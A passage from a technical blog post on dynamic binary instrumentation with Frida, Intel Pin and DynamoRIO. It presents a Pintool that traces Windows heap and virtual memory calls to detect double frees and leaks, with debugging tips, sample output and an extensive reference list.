reference, see: http://www.frida.re/docs/javascript-api/ */ { /** * Called synchronously when about to call malloc. * * @this {object} - Object allowing you to store state for use in onLeave. * @param {function} log - Call this function with a string to be presented to the user. * @param {array} args - Function arguments represented as an array of NativePointer objects. * For example use Memory.readUtf8String(args[0]) if the first argument is a pointer to a C string encoded as UTF-8. * It is also possible to modify arguments by assigning a NativePointer object to an element of this array. * @param {object} state - Object allowing you to keep state across function calls. * Only one JavaScript function will execute at a time, so do not worry about race-conditions. * However, do not use this to store function arguments across onEnter/onLeave, but instead * use "this" which is an object for keeping state local to an invocation. */ onEnter: function (log, args, state) { log("malloc()"); }, /** * Called synchronously when about to return from malloc. * * See onEnter for details. * * @this {object} - Object allowing you to access state stored in onEnter. * @param {function} log - Call this function with a string to be presented to the user. * @param {NativePointer} retval - Return value represented as a NativePointer object. * @param {object} state - Object allowing you to keep state across function calls. */ onLeave: function (log, retval, state) { } } We just need to tweak the onEnter and onLeave functions. For example. /* * Auto-generated by Frida. Please modify to match the signature of malloc. * This stub is currently auto-generated from manpages when available. * * For full API reference, see: http://www.frida.re/docs/javascript-api/ */ { /** * Called synchronously when about to call malloc. * * @this {object} - Object allowing you to store state for use in onLeave. * @param {function} log - Call this function with a string to be presented to the user. * @param {array} args - Function arguments represented as an array of NativePointer objects. * For example use Memory.readUtf8String(args[0]) if the first argument is a pointer to a C string encoded as UTF-8. * It is also possible to modify arguments by assigning a NativePointer object to an element of this array. * @param {object} state - Object allowing you to keep state across function calls. * Only one JavaScript function will execute at a time, so do not worry about race-conditions. * However, do not use this to store function arguments across onEnter/onLeave, but instead * use "this" which is an object for keeping state local to an invocation. */ onEnter: function (log, args, state) { log("malloc(" + args[0].toInt32() + ")"); }, /** * Called synchronously when about to return from malloc. * * See onEnter for details. * * @this {object} - Object allowing you to access state stored in onEnter. * @param {function} log - Call this function with a string to be presented to the user. * @param {NativePointer} retval - Return value represented as a NativePointer object. * @param {object} state - Object allowing you to keep state across function calls. */ onLeave: function (log, retval, state) { log("\t\t= 0x" + retval.toString(16)); } } Now, if we run again the exact same command as before we’ll get the following. C:\Users\bob\Desktop\frida>frida-trace -i malloc -i free .\ExercisePin.exe Instrumenting functions... malloc: Loaded handler at "C:\Users\bob\Desktop\frida\tmp\__handlers__\msvcrt.dll\malloc.js" malloc: Loaded handler at "C:\Users\bob\Desktop\frida\tmp\__handlers__\ucrtbase.DLL\malloc.js" free: Loaded handler at "C:\Users\bob\Desktop\frida\tmp\__handlers__\msvcrt.dll\free.js" free: Loaded handler at "C:\Users\bob\Desktop\frida\tmp\__handlers__\ucrtbase.DLL\free.js" Started tracing 4 functions. Press Ctrl+C to stop. done /* TID 0x23e4 */ 64 ms free(0x0) 64 ms malloc(2) 64 ms = 0x8a42a8 64 ms malloc(128) 64 ms = 0x8a57a0 64 ms malloc(128) 64 ms = 0x8a5828 64 ms malloc(128) 64 ms = 0x8a58b0 64 ms free(0x8a57a0) 64 ms free(0x8a58b0) 65 ms malloc(2) 65 ms = 0x8a42b8 Process terminated We can extend this program to get the exact same functionality as our Pintool, and check for memory corruption bugs instead of logging the calls only. I’ll leave that as an exercise for you. Debugging If you want to debug your Pintool you should use the -pause_tool switch and specify the number of seconds to wait until you attach the debugger to its process. See below how. C:\pin\source\tools\MallocTracer\Release>c:\pin\pin.exe -pause_tool 20 -t "C:\pin\source\tools\MallocTracer\Release\MallocTracer.dll" -- ExercisePin.exe Pausing for 20 seconds to attach to process with pid 1568 For debugging of the Pintool I actually don’t use Visual Studio, I prefer to use WinDbg because I’m used to it and it is awesome. Once you attach to the process with WinDbg it’s very easy to set up a breakpoint wherever you like in your Pintool. Below is just a simple example of setting a breakpoint in the main function of my Pintool. Microsoft (R) Windows Debugger Version 10.0.17134.12 X86 Copyright (c) Microsoft Corporation. All rights reserved. *** wait with pending attach Symbol search path is: srv* Executable search path is: ModLoad: 00080000 00087000 C:\pin\source\tools\MallocTracer\Release\ExercisePin.exe ModLoad: 77800000 77980000 C:\Windows\SysWOW64\ntdll.dll ModLoad: 769d0000 76ae0000 C:\Windows\syswow64\kernel32.dll ModLoad: 76b50000 76b97000 C:\Windows\syswow64\KERNELBASE.dll Break-in sent, waiting 30 seconds... ModLoad: 54c20000 54f93000 MallocTracer.dll It is now possible to set breakpoints in Pin tool. Use "Go" command (F5) to proceed. (620.12c0): Break instruction exception - code 80000003 (first chance) eax=00000000 ebx=53833c8c ecx=76b6388e edx=00000000 esi=53833c8c edi=53833cb8 eip=76b6338d esp=01ad1930 ebp=0042e7e4 iopl=0 nv up ei pl zr na pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246 KERNELBASE!DebugBreak+0x2: 76b6338d cc int 3 0:000> lmf start end module name 00080000 00087000 ExercisePin C:\pin\source\tools\MallocTracer\Release\ExercisePin.exe 54c20000 54f93000 MallocTracer MallocTracer.dll 769d0000 76ae0000 kernel32 C:\Windows\syswow64\kernel32.dll 76b50000 76b97000 KERNELBASE C:\Windows\syswow64\KERNELBASE.dll 77800000 77980000 ntdll C:\Windows\SysWOW64\ntdll.dll 0:000> lmDvmMallocTracer Browse full module list start end module name 54c20000 54f93000 MallocTracer (deferred) Image path: MallocTracer.dll Image name: MallocTracer.dll Browse all global symbols functions data Timestamp: Sat Jun 30 14:28:14 2018 (5B37F5EE) CheckSum: 00000000 ImageSize: 00373000 Translations: 0000.04b0 0000.04e4 0409.04b0 0409.04e4 Information from resource tables: 0:000> x /D /f MallocTracer!a* A B C D E F G H I J K L M N O P Q R S T U V W X Y Z *** WARNING: Unable to verify checksum for MallocTracer.dll 54c549b8 MallocTracer!ASM_pin_wow64_gate (<no parameter info>) 54c5483c MallocTracer!ATOMIC_Increment16 (<no parameter info>) 54c547d0 MallocTracer!ATOMIC_Swap8 (<no parameter info>) 54c54854 MallocTracer!ATOMIC_Increment32 (<no parameter info>) 54e28b64 MallocTracer!ADDRINT_AtomicInc (<no parameter info>) 54c35e20 MallocTracer!atexit (<no parameter info>) 54c547fc MallocTracer!ATOMIC_Swap32 (<no parameter info>) 54c54740 MallocTracer!ATOMIC_SpinDelay (<no parameter info>) 54c533c0 MallocTracer!ATOMIC::LIFO_PTR<LEVEL_BASE::SWMALLOC::FREE_LIST_ELEMENT,3,LEVEL_BASE::ATOMIC_STATS>::PopInternal (<no parameter info>) 54e1a2b0 MallocTracer!abort (<no parameter info>) 54c54810 MallocTracer!ATOMIC_Copy64 (<no parameter info>) 54c547e4 MallocTracer!ATOMIC_Swap16 (<no parameter info>) 54c41710 MallocTracer!ATOMIC::LIFO_CTR<ATOMIC::FIXED_LIFO<LEVEL_BASE::LOCK_COMMAND *,1,32,ATOMIC::NULLSTATS>::ELEMENT,ATOMIC::FIXED_LIFO<LEVEL_BASE::LOCK_COMMAND *,1,32,ATOMIC::NULLSTATS>::ELEMENT_HEAP,1,32,unsigned __int64,ATOMIC::NULLSTATS>::Pop (<no parameter info>) 54c54824 MallocTracer!ATOMIC_Increment8 (<no parameter info>) 54c549bb MallocTracer!ASM_pin_wow64_gate_end (<no parameter info>) 54c5478c MallocTracer!ATOMIC_CompareAndSwap32 (<no parameter info>) 54c54750 MallocTracer!ATOMIC_CompareAndSwap8 (<no parameter info>) 54c41820 MallocTracer!ATOMIC::LIFO_CTR<ATOMIC::FIXED_LIFO<LEVEL_BASE::LOCK_COMMAND *,1,32,ATOMIC::NULLSTATS>::ELEMENT,ATOMIC::FIXED_LIFO<LEVEL_BASE::LOCK_COMMAND *,1,32,ATOMIC::NULLSTATS>::ELEMENT_HEAP,1,32,unsigned __int64,ATOMIC::NULLSTATS>::Push (<no parameter info>) 54c535a0 MallocTracer!ATOMIC::IDSET<7,LEVEL_BASE::ATOMIC_STATS>::ReleaseID (<no parameter info>) 54c547a8 MallocTracer!ATOMIC_CompareAndSwap64 (<no parameter info>) 54c3e660 MallocTracer!ATOMIC::EXPONENTIAL_BACKOFF<LEVEL_BASE::ATOMIC_STATS>::~EXPONENTIAL_BACKOFF<LEVEL_BASE::ATOMIC_STATS> (<no parameter info>) 54c5476c MallocTracer!ATOMIC_CompareAndSwap16 (<no parameter info>) 0:000> x /D /f MallocTracer!m* A B C D E F G H I J K L M N O P Q R S T U V W X Y Z 54e21e20 MallocTracer!mbsinit (<no parameter info>) 54c6e450 MallocTracer!mmap (<no parameter info>) 54c3bb40 MallocTracer!malloc (<no parameter info>) 54e21db0 MallocTracer!memchr (<no parameter info>) 54e21e00 MallocTracer!mbrtowc (<no parameter info>) 54e26500 MallocTracer!mbrlen (<no parameter info>) 54e21e40 MallocTracer!mbsnrtowcs (<no parameter info>) 54e261b0 MallocTracer!mbrtoc32 (<no parameter info>) 54c38730 MallocTracer!main (<no parameter info>) 54e1a2f0 MallocTracer!memset (<no parameter info>) 54e26410 MallocTracer!mbstate_get_byte (<no parameter info>) 54e22010 MallocTracer!mbsrtowcs (<no parameter info>) 54e1a1a0 MallocTracer!memmove (<no parameter info>) 54e263e0 MallocTracer!mbstate_bytes_so_far (<no parameter info>) 54e1a2c0 MallocTracer!memcpy (<no parameter info>) 54c6e480 MallocTracer!munmap (<no parameter info>) 54e26420 MallocTracer!mbstate_set_byte (<no parameter info>) 0:000> bp 54c38730 0:000> g Breakpoint 0 hit eax=53833cb8 ebx=54f64000 ecx=00000000 edx=54f356c0 esi=54f6500a edi=54f65000 eip=54c38730 esp=01ad19f4 ebp=53833c8c iopl=0 nv up ei pl zr na pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246 MallocTracer!main: 54c38730 55 push ebp For DynamoRIO I’ll just point you to the official documentation since the debugging process can be a bit more tricky. Check the documentation here. Pintool (WinMallocTracer) As mentioned in the beginning, this post is all about Windows. Which means it doesn’t really make sense to be tracking malloc, and/or free. If we want to play with “real” Windows applications we need to trace the Windows Heap family of functions. It’s a good time to look again at the diagram shown before that illustrates the relationship of Windows API calls used to allocate process memory (from the book The Art of Memory Forensics). If we want to make sure we’ll always “see” the memory allocations performed by Windows applications, we should be looking for RtlAllocateHeap, RtlReAllocateHeap, RtlFreeHeap, VirtualAllocEx, and VirtualFreeEx. The Pintool below looks exactly at these functions. If you play a bit with multiple applications you’ll realize that to accomplish “our” goal of tracking memory allocations we’ll face a lot of challenges. The code below tries to overcome some of them. I won’t go into detail explaining the API calls used as I did before. Mainly because they are mostly the same. I’ll leave the code here and you can go through it. After I simply mention some of the main differences when compared to the basic Pintool presented before. #include "pin.h" #include <iostream> #include <fstream> #include <map> map<ADDRINT, bool> MallocMap; ofstream LogFile; KNOB<string> LogFileName(KNOB_MODE_WRITEONCE, "pintool", "o", "memprofile.out", "Memory trace file name"); KNOB<string> EntryPoint(KNOB_MODE_WRITEONCE, "pintool", "entrypoint", "main", "Guest entry-point function"); KNOB<BOOL> EnumSymbols(KNOB_MODE_WRITEONCE, "pintool", "symbols", "0", "List Symbols"); BOOL start_trace = false; VOID LogBeforeVirtualAlloc(ADDRINT size) { if (!start_trace) return; LogFile << "[*] VirtualAllocEx(" << dec << size << ")"; } VOID LogAfterVirtualAlloc(ADDRINT addr) { if (!start_trace) return; if (addr == NULL) { cerr << "[-] Error: VirtualAllocEx() return value was NULL."; return; } map<ADDRINT, bool>::iterator it = MallocMap.find(addr); if (it != MallocMap.end()) { if (it->second) it->second = false; else cerr << "[-] Error: allocating memory not freed!?!" << endl; } else { MallocMap.insert(pair<ADDRINT, bool>(addr, false)); LogFile << "\t\t= 0x" << hex << addr << endl; } } VOID LogBeforeVirtualFree(ADDRINT addr) { if (!start_trace) return; map<ADDRINT, bool>::iterator it = MallocMap.find(addr); if (it != MallocMap.end()) { if (it->second) LogFile << "[*] Memory at address 0x" << hex << addr << " has been freed more than once (Double Free)." << endl; else { it->second = true; // Mark it as freed LogFile << "[*] VirtualFreeEx(0x" << hex << addr << ")" << endl; } } else LogFile << "[*] Freeing unallocated memory at address 0x" << hex << addr << "." << endl; } VOID LogBeforeReAlloc(ADDRINT freed_addr, ADDRINT size) { if (!start_trace) return; // mark freed_addr as free map<ADDRINT, bool>::iterator it = MallocMap.find(freed_addr); if (it != MallocMap.end()) { it->second = true; LogFile << "[*] RtlHeapfree(0x" << hex << freed_addr << ") from RtlHeapRealloc()" << endl; } else LogFile << "[-] RtlHeapRealloc could not find addr to free??? - " << freed_addr << endl; LogFile << "[*] RtlHeapReAlloc(" << dec << size << ")"; } VOID LogAfterReAlloc(ADDRINT addr) { if (!start_trace) return; if (addr == NULL) return; map<ADDRINT, bool>::iterator it = MallocMap.find(addr); if (it != MallocMap.end()) { if (it->second) it->second = false; else // it already exists because of the HeapAlloc, we don't need to insert... just log it LogFile << "\t\t= 0x" << hex << addr << endl; } } VOID LogBeforeMalloc(ADDRINT size) { if (!start_trace) return; LogFile << "[*] RtlAllocateHeap(" << dec << size << ")"; } VOID LogAfterMalloc(ADDRINT addr) { if (!start_trace) return; if (addr == NULL) { cerr << "[-] Error: RtlAllocateHeap() return value was NULL."; return; } map<ADDRINT, bool>::iterator it = MallocMap.find(addr); if (it != MallocMap.end()) { if (it->second) it->second = false; else cerr << "[-] Error: allocating memory not freed!?!" << endl; } else { MallocMap.insert(pair<ADDRINT, bool>(addr, false)); LogFile << "\t\t= 0x" << hex << addr << endl; } } VOID LogFree(ADDRINT addr) { if (!start_trace) return; map<ADDRINT, bool>::iterator it = MallocMap.find(addr); if (it != MallocMap.end()) { if (it->second) LogFile << "[*] Memory at address 0x" << hex << addr << " has been freed more than once (Double Free)." << endl; else { it->second = true; // Mark it as freed LogFile << "[*] RtlFreeHeap(0x" << hex << addr << ")" << endl; } } else LogFile << "[*] Freeing unallocated memory at address 0x" << hex << addr << "." << endl; } VOID BeforeMain() { start_trace = true; } VOID AfterMain() { start_trace = false; } VOID CustomInstrumentation(IMG img, VOID *v) { for (SYM sym = IMG_RegsymHead(img); SYM_Valid(sym); sym = SYM_Next(sym)) { string undFuncName = PIN_UndecorateSymbolName(SYM_Name(sym), UNDECORATION_NAME_ONLY); if(EnumSymbols.Value()) { LogFile << "" << undFuncName << "" << endl; continue; } if (undFuncName == EntryPoint.Value().c_str()) { RTN allocRtn = RTN_FindByAddress(IMG_LowAddress(img) + SYM_Value(sym)); if (RTN_Valid(allocRtn)) { RTN_Open(allocRtn); RTN_InsertCall(allocRtn, IPOINT_BEFORE, (AFUNPTR)BeforeMain, IARG_END); RTN_InsertCall(allocRtn, IPOINT_AFTER, (AFUNPTR)AfterMain, IARG_END); RTN_Close(allocRtn); } } if (undFuncName == "RtlAllocateHeap") { RTN allocRtn = RTN_FindByAddress(IMG_LowAddress(img) + SYM_Value(sym)); if (RTN_Valid(allocRtn)) { RTN_Open(allocRtn); // Record RtlAllocateHeap size RTN_InsertCall(allocRtn, IPOINT_BEFORE, (AFUNPTR)LogBeforeMalloc, IARG_FUNCARG_ENTRYPOINT_VALUE, 2, IARG_END); // Record RtlAllocateHeap return address RTN_InsertCall(allocRtn, IPOINT_AFTER, (AFUNPTR)LogAfterMalloc, IARG_FUNCRET_EXITPOINT_VALUE, IARG_END); RTN_Close(allocRtn); } } if (undFuncName == "RtlReAllocateHeap") { RTN reallocRtn = RTN_FindByAddress(IMG_LowAddress(img) + SYM_Value(sym)); if (RTN_Valid(reallocRtn)) { RTN_Open(reallocRtn); // Record RtlReAllocateHeap freed_addr, size RTN_InsertCall(reallocRtn, IPOINT_BEFORE, (AFUNPTR)LogBeforeReAlloc, IARG_FUNCARG_ENTRYPOINT_VALUE, 2, IARG_FUNCARG_ENTRYPOINT_VALUE, 3, IARG_END); // Record RtlReAllocateHeap return address RTN_InsertCall(reallocRtn, IPOINT_AFTER, (AFUNPTR)LogAfterReAlloc, IARG_FUNCRET_EXITPOINT_VALUE, IARG_END); RTN_Close(reallocRtn); } } else if (undFuncName == "RtlFreeHeap") { RTN freeRtn = RTN_FindByAddress(IMG_LowAddress(img) + SYM_Value(sym)); if (RTN_Valid(freeRtn)) { RTN_Open(freeRtn); RTN_InsertCall(freeRtn, IPOINT_BEFORE, (AFUNPTR)LogFree, IARG_FUNCARG_ENTRYPOINT_VALUE, 2, IARG_END); RTN_Close(freeRtn); } } if (undFuncName == "VirtualAllocEx") { RTN vrallocRtn = RTN_FindByAddress(IMG_LowAddress(img) + SYM_Value(sym)); if (RTN_Valid(vrallocRtn)) { RTN_Open(vrallocRtn); RTN_InsertCall(vrallocRtn, IPOINT_BEFORE, (AFUNPTR)LogBeforeVirtualAlloc, IARG_FUNCARG_ENTRYPOINT_VALUE, 2, IARG_END); RTN_InsertCall(vrallocRtn, IPOINT_AFTER, (AFUNPTR)LogAfterVirtualAlloc, IARG_FUNCRET_EXITPOINT_VALUE, IARG_END); RTN_Close(vrallocRtn); } } if (undFuncName == "VirtualFreeEx") { RTN vrfreeRtn = RTN_FindByAddress(IMG_LowAddress(img) + SYM_Value(sym)); if (RTN_Valid(vrfreeRtn)) { RTN_Open(vrfreeRtn); RTN_InsertCall(vrfreeRtn, IPOINT_BEFORE, (AFUNPTR)LogBeforeVirtualFree, IARG_FUNCARG_ENTRYPOINT_VALUE, 1, IARG_END); RTN_Close(vrfreeRtn); } } } } VOID FinalFunc(INT32 code, VOID *v) { for (pair<ADDRINT, bool> p : MallocMap) { if (!p.second) LogFile << "[*] Memory at address 0x" << hex << p.first << " allocated but not freed" << endl; } LogFile.close(); } int main(int argc, char *argv[]) { PIN_InitSymbols(); PIN_Init(argc, argv); LogFile.open(LogFileName.Value().c_str()); LogFile << "## Memory tracing for PID = " << PIN_GetPid() << " started" << endl; if (EnumSymbols.Value()) LogFile << "### Listing Symbols" << endl; else LogFile << "### Started tracing after '" << EntryPoint.Value().c_str() << "()' call" << endl; IMG_AddInstrumentFunction(CustomInstrumentation, NULL); PIN_AddFiniFunction(FinalFunc, NULL); PIN_StartProgram(); return 0; } There are a couple of new options supported by this Pintool. If you look at the KNOB switches (below), you’ll see that the Pintool now supports two new options. KNOB<string> EntryPoint(KNOB_MODE_WRITEONCE, "pintool", "entrypoint", "main", "Guest entry-point function"); KNOB<BOOL> EnumSymbols(KNOB_MODE_WRITEONCE, "pintool", "symbols", "0", "List Symbols"); You can specify what’s the entry-point function of the target/guest application you want to trace. Why is this useful? If you don’t do it, all the initialization code will also be traced and it will become very hard to make sense of the output of our Pintool. Try. By default, the tracing will start only after the function main is called. Obviously, if our target/guest application doesn’t have a main function, we’ll end with an empty output file. Let’s look at a specific example. Let’s look at the Windows calc.exe. This binary doesn’t have a main function. So we run our Pintool as shown below. C:\pin>pin -t source\tools\WinMallocTracer\Release\WinMallocTracer.dll -- calc.exe We’ll get the following output. ## Memory tracing for PID = 1732 started ### Started tracing after 'main()' call As expected, since calc.exe doesn’t have a main function. So, if we want to trace calc.exe or any other binary, we’ll need to find what’s its entry-point (or any other call after we want to start our trace). We can launch it on IDA, for example, or we can use the other KNOB switch (-symbols) as shown below to list all the symbols. C:\pin>pin -t source\tools\WinMallocTracer\Release\WinMallocTracer.dll -symbols 1 -- calc.exe And look at the output file (by default memprofile.out) to see if we can find the function we are looking for. C:\pin> type memprofile.out ## Memory tracing for PID = 5696 started ### Listing Symbols unnamedImageEntryPoint InterlockedIncrement InterlockedDecrement InterlockedExchange InterlockedCompareExchange InterlockedExchangeAdd KernelBaseGetGlobalData unnamedImageEntryPoint GetErrorMode SetErrorMode CreateIoCompletionPort PostQueuedCompletionStatus GetOverlappedResult (...) If you want to see the whole contents of the file you can find it here. The first line is quite interesting though, and it’s probably what we are looking for (unnamedImageEntryPoint). So we can use our Pintool as shown below. C:\pin>pin -t source\tools\WinMallocTracer\Release\WinMallocTracer.dll -entrypoint unnamedImageEntryPoint -- calc.exe And if we look at the output this time we’ll get something like: C:\pin> type memprofile.out ## Memory tracing for PID = 6656 started ### Started tracing after 'unnamedImageEntryPoint()' call [*] RtlAllocateHeap(32) = 0x4d9098 [*] RtlAllocateHeap(564) = 0x2050590 [*] RtlAllocateHeap(520) = 0x4dcb18 [*] RtlAllocateHeap(1024) = 0x4dd240 [*] RtlAllocateHeap(532) = 0x20507d0 [*] RtlAllocateHeap(1152) = 0x20509f0 [*] RtlAllocateHeap(3608) = 0x4dd648 [*] RtlAllocateHeap(1804) = 0x2050e78 [*] RtlFreeHeap(0x4dd648) (...) If you want to see the whole contents of the file you can find it here. As you’ll see, it’s still hard to read and make sense of the output. As I mentioned before, this Pintool can actually tell there’s a problem, but not where it is. I’ll try to improve the Pintool, and if you are interested you can follow its future developments here. At least, every time I detect an issue I’ll add a PIN_ApplicationBreakpoint. In some cases, it might still be very hard to locate the issue, but it’s a starting point. There are also a lot of false positives, as you can see in the output of calc.exe. To validate that actually the Pintool is working we can use the following sample target/guest (I called it ExercisePin2.exe). #include <windows.h> #include <stdio.h> #define PAGELIMIT 80 int my_heap_functions(char *buf) { HLOCAL h1 = 0, h2 = 0, h3 = 0, h4 = 0; h1 = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, 260); h2 = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, 260); HeapFree(GetProcessHeap(), 0, h1); h3 = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, 520); h4 = HeapReAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, h3, 1040); HeapFree(GetProcessHeap(), 0, h4); return 0; } int my_virtual_functions(char *buf) { LPVOID lpvBase; DWORD dwPageSize; BOOL bSuccess; SYSTEM_INFO sSysInfo; // Useful information about the system GetSystemInfo(&sSysInfo); // Initialize the structure. dwPageSize = sSysInfo.dwPageSize; // Reserve pages in the virtual address space of the process. lpvBase = VirtualAlloc( NULL, // System selects address PAGELIMIT*dwPageSize, // Size of allocation MEM_RESERVE, // Allocate reserved pages PAGE_NOACCESS); // Protection = no access if (lpvBase == NULL) exit("VirtualAlloc reserve failed."); bSuccess = VirtualFree( lpvBase, // Base address of block 0, // Bytes of committed pages MEM_RELEASE); // Decommit the pages return 0; } int main(void) { my_heap_functions("moo"); my_virtual_functions("moo"); return 0; } You can find the Visual Studio project here. You can play with it a compare the output with what’s expected based on ExercisePin2.c source code. C:\pin>pin -t source\tools\WinMallocTracer\Release\WinMallocTracer.dll -symbols 1 -- C:\TARGET\ExercisePin2.exe C:\pin> type memprofile.out ## Memory tracing for PID = 5600 started ### Listing Symbols _enc$textbss$end unnamedImageEntryPoint main my_heap_functions my_virtual_functions HeapAlloc HeapReAlloc HeapFree GetProcessHeap GetSystemInfo (...) The full output is here. Since the entry-point function is main, we can simply run the Pintool without passing anything to it. C:\pin>pin -t source\tools\WinMallocTracer\Release\WinMallocTracer.dll -- C:\TARGET\ExercisePin2.exe C:\pin> type memprofile.out ## Memory tracing for PID = 4396 started ### Started tracing after 'main()' call [*] RtlAllocateHeap(260) = 0x41dd30 [*] RtlAllocateHeap(260) = 0x41de40 [*] RtlFreeHeap(0x41dd30) [*] RtlAllocateHeap(520) = 0x41df50 [*] RtlHeapfree(0x41df50) from RtlHeapRealloc() [*] RtlHeapReAlloc(1040) = 0x41df50 [*] RtlFreeHeap(0x41df50) [*] VirtualAllocEx(327680) = 0x2410000 [*] VirtualFreeEx(0x2410000) [*] Memory at address 0x41de40 allocated but not freed As we can see, tracing memory calls is tricky, but achievable. I’ll try to add a few more things to this WinMallocTracer Pintool in a near future. Keep an eye on GitHub if you fancy. Final notes Playing with a DBI framework is not that hard, as we saw, the challenge lies in doing it right. That is, handle all the corner cases efficiently. Something that looks fairly easy can become very challenging if we are going to do it right. The example tool I chose came from a specific need, and from a vulnerability discovering perspective DBI frameworks are indeed very useful. There’s a lot of room for improvement, and I plan to keep working on it. Even though it was the Fuzzing subject that brought me here (that is, playing with DBI frameworks) I ended up not talking too much about its relationship. Think that a DBI tool per si won’t find many bugs unless you exercise as many code paths as possible. After all, a DBI system only modifies the code that’s executed. So, it’s easy to understand that we need to combine it with a coverage-guided Fuzzer to discover more bugs (preferably, exploitable). DBI systems are here to stay, they emerged as a means for bypassing the restrictions imposed by binary code. Or, lack of access to source code. The need to understand, and modify the runtime behavior, of computer programs, is undeniable. The field of dynamic binary modification is evolving very fast. New applications and new complex engineering challenges are appearing constantly and static binary patching and hooking are “things” from the past. This post documents the first steps if you want to get into this area. All the code snippets used are available at my GitHub. References (in no particular order) https://en.wikipedia.org/wiki/Pin_(computer_program) https://en.wikipedia.org/wiki/Dynamic_program_analysis https://en.wikipedia.org/wiki/Instrumentation_(computer_programming) http://uninformed.org/index.cgi?v=7&a=1&p=3 https://software.intel.com/sites/landingpage/pintool/docs/97619/Pin/html/ http://www.ic.unicamp.br/~rodolfo/mo801/04-PinTutorial.pdf https://software.intel.com/en-us/articles/pin-a-dynamic-binary-instrumentation-tool https://software.intel.com/sites/default/files/managed/62/f4/cgo2013.pdf https://software.intel.com/sites/default/files/m/d/4/1/d/8/pin_tutorial_cgo_ispass_2012.ppt https://software.intel.com/sites/default/files/m/d/4/1/d/8/Pin_tutorial_cgo_2011_final_1.ppt https://software.intel.com/sites/default/files/article/256675/cgo-2010-final.ppt https://msdn.microsoft.com/en-gb/magazine/dn818497.aspx (got a bunch of ideas from this post) https://github.com/jingpu/pintools/blob/master/source/tools/ManualExamples/w_malloctrace.cpp https://github.com/corelan/pin http://dynamorio.org/docs/ http://dynamorio.org/tutorial.html http://dynamorio.org/pubs.html http://dynamorio.org/docs/API_BT.html#sec_decode https://groups.google.com/forum/#!forum/dynamorio-users http://dynamorio.org/docs/samples/wrap.c https://github.com/DynamoRIO/dynamorio/blob/master/api/samples/ssljack.c https://axtaxt.wordpress.com/2014/03/02/implementing-a-simple-hit-tracer-in-dynamorio/ Building Dynamic Instrumentation Tools with DynamoRIO https://media.blackhat.com/bh-us-11/Diskin/BH_US_11_Diskin_Binary_Instrumentation_Slides.pdf Using Binary Instrumentation for Vulnerability Discovery (mandatory) Dynamic Binary Analysis and Instrumentation Covering a function using a DSE approach (mandatory) http://2011.zeronights.org/files/dmitriyd1g1evdokimov-dbiintro-111202045015-phpapp01.pdf https://qbdi.quarkslab.com/QBDI_34c3.pdf Getting fun with Frida (mandatory) https://dyninst.org/sites/default/files/manuals/dyninst/dyninstAPI.pdf https://www.frida.re/docs/home/ https://www.frida.re/docs/presentations/ https://monosource.github.io/tutorial/2017/01/26/frida-linux-part1/ (my frida section comes mostly from here) https://vicarius.io/blog/wtf-is-frida/ http://blog.kalleberg.org/post/833101026/live-x86-code-instrumentation-with-frida https://www.codemetrix.net/hacking-android-apps-with-frida-1/ https://en.wikipedia.org/wiki/Chrome_V8 https://github.com/BinaryAnalysisPlatform/bap-tutorial Hiding PIN’s Artifacts to Defeat Evasive Malware https://software.intel.com/en-us/articles/pin-errors-in-2017-update-3-and-4-analysis-tools Pwning Intel Pin Reconsidering Intel Pin in Context of Security Dynamic Program Analysis and Optimization under DynamoRIO https://bsidesvienna.at/slides/2017/the_art_of_fuzzing.pdf https://libraries.io/github/memtt/malt http://3nity.io/~vj/downloads/publications/pldi05_pin.pdf http://valgrind.org/docs/valgrind2007.pdf http://groups.csail.mit.edu/commit/papers/03/RIO-adaptive-CGO03.pdf http://groups.csail.mit.edu/commit/papers/01/RIO-FDDO.pdf Triton Concolic Execution Framework https://www.cc.gatech.edu/~orso/papers/clause.li.orso.ISSTA07.pdf http://www-leland.stanford.edu/class/cs343/resources/shadow-memory2007.pdf http://www.burningcutlery.com/derek/docs/drmem-CGO11.pdf http://valgrind.org/docs/iiswc2006.pdf https://pdfs.semanticscholar.org/1156/5da78c06a94c1fc8a0ff3a8d710cb9a5d450.pdf http://homepages.dcc.ufmg.br/~fernando/publications/papers_pt/Tymburiba15Tools.pdf http://delivery.acm.org/10.1145/3030000/3029812/p219-elsabagh.pdf http://sharcs-project.eu/m/filer_public/74/5c/745c0bf6-7636-405f-86e6-089ac630f0d2/patharmor_ccs15.pdf https://www.bodden.de/pubs/fb2016ropocop.pdf https://arxiv.org/pdf/1502.03245.pdf https://suif.stanford.edu/papers/vmi-ndss03.pdf https://recon.cx/2012/schedule/attachments/42_FalconRiva_2012.pdf https://hackinparis.com/data/slides/2013/slidesricardorodriguez.pdf Black Box Auditing Adobe Shockwave Covert Debugging Circumventing Software Armoring Techniques Shellcode analysis using dynamic binary instrumentation http://taviso.decsystem.org/making_software_dumber.pdf http://web.cs.iastate.edu/~weile/cs513x/2018spring/taintanalysis.pdf Hybrid analysis of executables to detect security vulnerabilities Tripoux Reverse Engineering Of Malware Packers For Dummies https://pdfs.semanticscholar.org/presentation/c135/68c933ea8f6a91db67a103715fd1d4ce2253.pdf https://code.google.com/archive/p/devilheart/ http://groups.csail.mit.edu/commit/papers/02/RIO-security-usenix.pdf http://pages.cs.wisc.edu/~madhurm/pindb/pindb.pdf https://www.usenix.org/legacy/event/osdi10/tech/full_papers/Enck.pdf https://deepsec.net/docs/Slides/2009/DeepSec_2009Daniel_Reynaud-_Deobfuscation_Unpacking.pdf http://fmv.jku.at/master/Holzleiter-MasterThesis-2009.pdf http://csl.cs.ucf.edu/debugging/user_guide.html http://bitblaze.cs.berkeley.edu/papers/sweeper.pdf http://www.ece.neu.edu/groups/nucar/publications/ASSISD06moffie.pdf https://events.ccc.de/congress/2009/Fahrplan/attachments/1430_secuBT.pdf https://recon.cx/2010/slides/Recon2010-UnderStaningSwizzorObfuscation.pdf http://www.dtic.mil/dtic/tr/fulltext/u2/a462289.pdf Pin++: A Object-oriented Framework for Writing Pintools Rootkit detection via Kernel Code Tunneling https://media.blackhat.com/bh-eu-11/Mihai_Chiriac/BlackHat_EU_2011_Chiriac_Rootkit_detection-WP.pdf https://www.cc.gatech.edu/~orso/papers/clause.li.orso.ISSTA07.pdf https://recon.cx/2014/slides/pinpoint_control_for_analyzing_malware_recon2014_jjones.pdf https://arxiv.org/pdf/1503.01186.pdf 